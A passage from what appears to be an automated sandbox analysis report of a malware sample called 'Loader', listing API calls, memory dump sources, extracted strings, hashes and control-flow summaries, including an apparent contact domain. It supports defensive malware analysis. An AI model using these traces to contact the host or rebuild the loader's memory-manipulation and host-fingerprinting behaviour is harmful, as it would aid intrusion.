                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$($($-$A$G$I$N$X$l$n${
                                                                                        • API String ID: 0-3018408179
                                                                                        • Opcode ID: 5e103353c0778339808f6a7ca294803b546d41d14dbeded6291cd10cad3a3d9b
                                                                                        • Instruction ID: 45de6dd5686d3479f9f5989f6b87c12e9a5a75427f0c78b35cf7a0a625548742
                                                                                        • Opcode Fuzzy Hash: 5e103353c0778339808f6a7ca294803b546d41d14dbeded6291cd10cad3a3d9b
                                                                                        • Instruction Fuzzy Hash: 4462D372A0D7908BC3249B3984853DFBBD2ABC5314F198A3ED9D9D73C1D67889818B47

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !@$,$/$5$6$B$D$k$m$n$o
                                                                                        • API String ID: 0-3097700080
                                                                                        • Opcode ID: e9b4c7f56e078db1dc93f1a691f4ce93547a1584786ce6f13b527817904f49de
                                                                                        • Instruction ID: dc28331636f64223628dcf67653152bfe71e102bd96d9b605168d7f034e00d79
                                                                                        • Opcode Fuzzy Hash: e9b4c7f56e078db1dc93f1a691f4ce93547a1584786ce6f13b527817904f49de
                                                                                        • Instruction Fuzzy Hash: DD32F17170C7908FD3248B28D49136FBBE1ABD9314F58892EE5D6873D2D6BD8841874B

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?), ref: 0042DC68
                                                                                        • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042DCA2
                                                                                        • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042DD66
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ComputerName$FreeLibrary
                                                                                        • String ID: _$uHHs
                                                                                        • API String ID: 2243422189-2879388440
                                                                                        • Opcode ID: 5da1a61b1ac2646240e8ef51aa07ea68389517e308048d9ed602d276010136ed
                                                                                        • Instruction ID: 657a4d5abfb12f1dc895d1f067591f20c39952d2f974751b242cefe10b9506bf
                                                                                        • Opcode Fuzzy Hash: 5da1a61b1ac2646240e8ef51aa07ea68389517e308048d9ed602d276010136ed
                                                                                        • Instruction Fuzzy Hash: 24D1D3606187E08AD7358F3994A07BBBBD1AFA7304F5849AED4C98B382C7394505CB57

                                                                                        Control-flow Graph

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: AF$EG$IK$stu
                                                                                        • API String ID: 0-1635301703
                                                                                        • Opcode ID: 2eb72137ecd42df3155bdba8500a69820cb5c5c9371d7a7e8082faf064e55606
                                                                                        • Instruction ID: 39eb04832eb88fb9aa3c4d3716742c09fe3224a1bca5495eee59028efd12266c
                                                                                        • Opcode Fuzzy Hash: 2eb72137ecd42df3155bdba8500a69820cb5c5c9371d7a7e8082faf064e55606
                                                                                        • Instruction Fuzzy Hash: 75D168B5E00211DFDB10CF64D882A6BBB71FF46315F1581A9E941AF352E738A901CF99

                                                                                         Control-flow Graph
                                                                                         • Graph rendering omitted; basic blocks 4085d0-4087e5 with subcalls to 43bc50, 434a50, 43c2b0, 409aa0, 40c5c0, 40b3c0 and API calls to GetCurrentProcessId, GetCurrentThreadId, SHGetSpecialFolderPathW, GetForegroundWindow and ExitProcess
                                                                                        APIs
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004085F4
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004085FE
                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408713
                                                                                        • GetForegroundWindow.USER32 ref: 00408728
                                                                                          • Part of subcall function 0040C5C0: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C5D3
                                                                                          • Part of subcall function 0040B3C0: FreeLibrary.KERNEL32(004087DE), ref: 0040B3C6
                                                                                          • Part of subcall function 0040B3C0: FreeLibrary.KERNEL32 ref: 0040B3E7
                                                                                        • ExitProcess.KERNEL32 ref: 004087E5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3072701918-0
                                                                                        • Opcode ID: fe482df24c23ab2d83c4cdaab97ad3ceae6a21e14e152c6932b3668e755f558a
                                                                                        • Instruction ID: e578a3b207df15b92ed52ca48c6c45aa0500652032070dd10f4452ae5aeaaed9
                                                                                        • Opcode Fuzzy Hash: fe482df24c23ab2d83c4cdaab97ad3ceae6a21e14e152c6932b3668e755f558a
                                                                                        • Instruction Fuzzy Hash: 39512877F547184BC318AEB98D8636AF6C65BC4210F0E813EA985E73D1EDB89C4542C8

                                                                                         Control-flow Graph
                                                                                         • Graph rendering omitted; basic blocks 42db7a-42e20c with subcalls to 43dd00, 4309d0 and two API calls to GetComputerNameExA
                                                                                        APIs
                                                                                        • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042DCA2
                                                                                        • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042DD66
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ComputerName
                                                                                        • String ID: _$uHHs
                                                                                        • API String ID: 3545744682-2879388440
                                                                                        • Opcode ID: fff4d2ae5a9090df37eee2bfda5c873a54dc35febac4667e5f7cefb26893c0c6
                                                                                        • Instruction ID: 6fef95053ab342754befd2ad3e4f8b718065d38dd91b4b55b8e1a17b79ce2dd8
                                                                                        • Opcode Fuzzy Hash: fff4d2ae5a9090df37eee2bfda5c873a54dc35febac4667e5f7cefb26893c0c6
                                                                                        • Instruction Fuzzy Hash: E4E127206183E08ED735CB3994917BBBBD1AFA7304F58896ED4D98B382C739850AC757

                                                                                         Control-flow Graph
                                                                                         • Graph rendering omitted; basic blocks 40a8c0-40ad36 with subcalls to 40b3f0, 43a940 and 40a630
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $>$$>$/ $@G$xA
                                                                                        • API String ID: 0-3945432221
                                                                                        • Opcode ID: 1f9dd7b07d0464a3871681ac543f7f30e7f289b115bd5a1a199045cae91454cc
                                                                                        • Instruction ID: 55ac8b7e195ada22395993ae97bb18e0f83c644d7aeb54a7be5ab8cf0bb5c33f
                                                                                        • Opcode Fuzzy Hash: 1f9dd7b07d0464a3871681ac543f7f30e7f289b115bd5a1a199045cae91454cc
                                                                                        • Instruction Fuzzy Hash: AFB1167520C3508BD324CF1884906AFBBE2EFC2704F18497DE9D12B381D679995AD78B

                                                                                         Control-flow Graph
                                                                                         • Graph rendering omitted; basic blocks aff5c0-aff70f with subcalls to afeed0, afebf0 and two API calls to NtProtectVirtualMemory
                                                                                        APIs
                                                                                        • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000002,00000000,00000000,00000000,082962C8,?,?,00AFE8E1,?,00000000,?), ref: 00AFF601
                                                                                        • NtProtectVirtualMemory.NTDLL(000000FF,?,00AFE8E1,00000000,00000000,00000000,00000000,082962C8,?,?,00AFE8E1,?,00000000,?), ref: 00AFF703
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711504076.0000000000AFE000.00000040.00000010.00020000.00000000.sdmp, Offset: 00AFE000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_afe000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2706961497-3916222277
                                                                                        • Opcode ID: 7c3c623b9836fa83dbdc5394a12b48ed3865b76677a6f9c3d53535781c8631a1
                                                                                        • Instruction ID: 8b9e0ee6cff83f9f7740722dbac45e82544ea5c26c6e0d65c522bce420e6308c
                                                                                        • Opcode Fuzzy Hash: 7c3c623b9836fa83dbdc5394a12b48ed3865b76677a6f9c3d53535781c8631a1
                                                                                        • Instruction Fuzzy Hash: 774115B1D0020DABDB04CFD4C981AFEBBB5EF58310F20855AE915AB291D7389A41DBA0

                                                                                         Control-flow Graph
                                                                                         • Graph rendering omitted; basic blocks 40d120-40d557 with subcalls to 409600, 40b3f0 and an API call to CoUninitialize
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Uninitialize
                                                                                        • String ID: D$ingreem-eilish.biz
                                                                                        • API String ID: 3861434553-1775330692
                                                                                        • Opcode ID: c6607468542c65a9894b4d5e932ac42de7adf9d9df50bf63ac7d2a47c1c64f60
                                                                                        • Instruction ID: db83cc6d0157fc327276ba6685622738ae1c34c2f9734926ad1cda59646cf540
                                                                                        • Opcode Fuzzy Hash: c6607468542c65a9894b4d5e932ac42de7adf9d9df50bf63ac7d2a47c1c64f60
                                                                                        • Instruction Fuzzy Hash: 8BA110B55083928FD335CF2584A07EBBBE1AFD6300F0889ADD0D95B392D775490ACB96

                                                                                         Control-flow Graph
                                                                                         • Graph rendering omitted; basic blocks 40c63c-40ce9b with subcalls to 408540, 437bc0 and 40b3f0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: A313BACE34A2B05E25E054D164A37606$^_$ingreem-eilish.biz
                                                                                        • API String ID: 0-2128005225
                                                                                        • Opcode ID: 1756b59fe5bbb69c448a25ce81c9b929e652f332c93af6c72070d1cd974e5a62
                                                                                        • Instruction ID: dd9baf14083705404bbb6167aa7354d43b480db8533e0b19abc2341ccbf856c6
                                                                                        • Opcode Fuzzy Hash: 1756b59fe5bbb69c448a25ce81c9b929e652f332c93af6c72070d1cd974e5a62
                                                                                        • Instruction Fuzzy Hash: C1020DB158E3928AD334CF2594907EBBBE1EBD6304F088A6DC4D91B342D7390909DBD6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                         • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: I^]J$x[EH
                                                                                        • API String ID: 2994545307-931091327
APIs
• NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,?,00003000,00000004,00000000,00000000,6793C34C), ref: 00AFF102
Memory Dump Source
• Source File: 00000001.00000002.2711504076.0000000000AFE000.00000040.00000010.00020000.00000000.sdmp, Offset: 00AFE000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_afe000_Loader.jbxd
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
Memory Dump Source
• Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Loader.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Strings
Memory Dump Source
• Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Loader.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-3019521637
APIs
• LdrInitializeThunk.NTDLL(0043E40B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C35E
Memory Dump Source
• Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Loader.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Strings
Memory Dump Source
• Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Loader.jbxd
Similarity
• API ID: InitializeThunk
• String ID: @
• API String ID: 2994545307-2766056989
Memory Dump Source
• Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Loader.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Loader.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Memory Dump Source
• Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Loader.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Memory Dump Source
• Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Loader.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Memory Dump Source
• Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Loader.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph
APIs
• __freea.LIBCMT ref: 011CC7B5
  • Part of subcall function 011CA888: HeapAlloc.KERNEL32(00000000,011C99B7,011CB787,?,011C99B7,00000220,?,?,011CB787), ref: 011CA8BA
• __freea.LIBCMT ref: 011CC7C8
• __freea.LIBCMT ref: 011CC7D5
Memory Dump Source
• Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
Similarity
• API ID: __freea$AllocHeap
• String ID:
• API String ID: 85559729-0
APIs
  • Part of subcall function 011C96EA: GetOEMCP.KERNEL32(00000000,?,?,?,011CB787), ref: 011C9715
• IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,011C99FA,?,00000000,?,?,011CB787), ref: 011C9C14
• GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,011C99FA,?,00000000,?,?,011CB787), ref: 011C9C50
Memory Dump Source
• Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
Similarity
• API ID: CodeInfoPageValid
• String ID:
• API String ID: 546120528-0
                                                                                        • Opcode ID: c277c37071218c0a5b063d85f32a6031261e1d59d62a5136e868c027436738fc
                                                                                        • Instruction ID: 72b4e8b1dbe62080afb29a8a25926d17f17421c157a9636887050ac71a025f09
                                                                                        • Opcode Fuzzy Hash: c277c37071218c0a5b063d85f32a6031261e1d59d62a5136e868c027436738fc
                                                                                        • Instruction Fuzzy Hash: 4E513870A003499EDB29CF39C4406FEBBF5EFA1B0CF18406EC1969B291DB799545CB50
                                                                                        APIs
                                                                                        • LCMapStringEx.KERNELBASE(?,011CC6F0,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 011CB121
                                                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,011CC6F0,?,?,-00000008,?,00000000), ref: 011CB13F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: String
                                                                                        • String ID:
                                                                                        • API String ID: 2568140703-0
                                                                                        • Opcode ID: 89ff164a05d8ec91a857a90de6c7580a3ae0506ad3f60a9942102410616ba727
                                                                                        • Instruction ID: d8cf0da1d476c18d7e468a513fabf759b9525ee2be021159bd1889b55d58388d
                                                                                        • Opcode Fuzzy Hash: 89ff164a05d8ec91a857a90de6c7580a3ae0506ad3f60a9942102410616ba727
                                                                                        • Instruction Fuzzy Hash: 24F07A3250515ABBCF166F90EC05DDE3F66EF687A5F054014FA1865020D736C871AB95
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32 ref: 0043C5AF
                                                                                        • GetForegroundWindow.USER32 ref: 0043C5C0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ForegroundWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2020703349-0
                                                                                        • Opcode ID: 79680ac2d5f547ec917eb5f99452d1fa5a9d20136bed208c7213e3ef94e53174
                                                                                        • Instruction ID: 333b4a9834557b4172d2651f462c7a903e8ce65bf7bd4680bd615953da4b5774
                                                                                        • Opcode Fuzzy Hash: 79680ac2d5f547ec917eb5f99452d1fa5a9d20136bed208c7213e3ef94e53174
                                                                                        • Instruction Fuzzy Hash: 80D05EE995150047CA04BB71AC858273229F64B34A7186878E00301262EA25A0428B5B
                                                                                        APIs
                                                                                        • GetCPInfo.KERNEL32(FFFFF9B5,?,00000005,011C99FA,?), ref: 011C97F0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
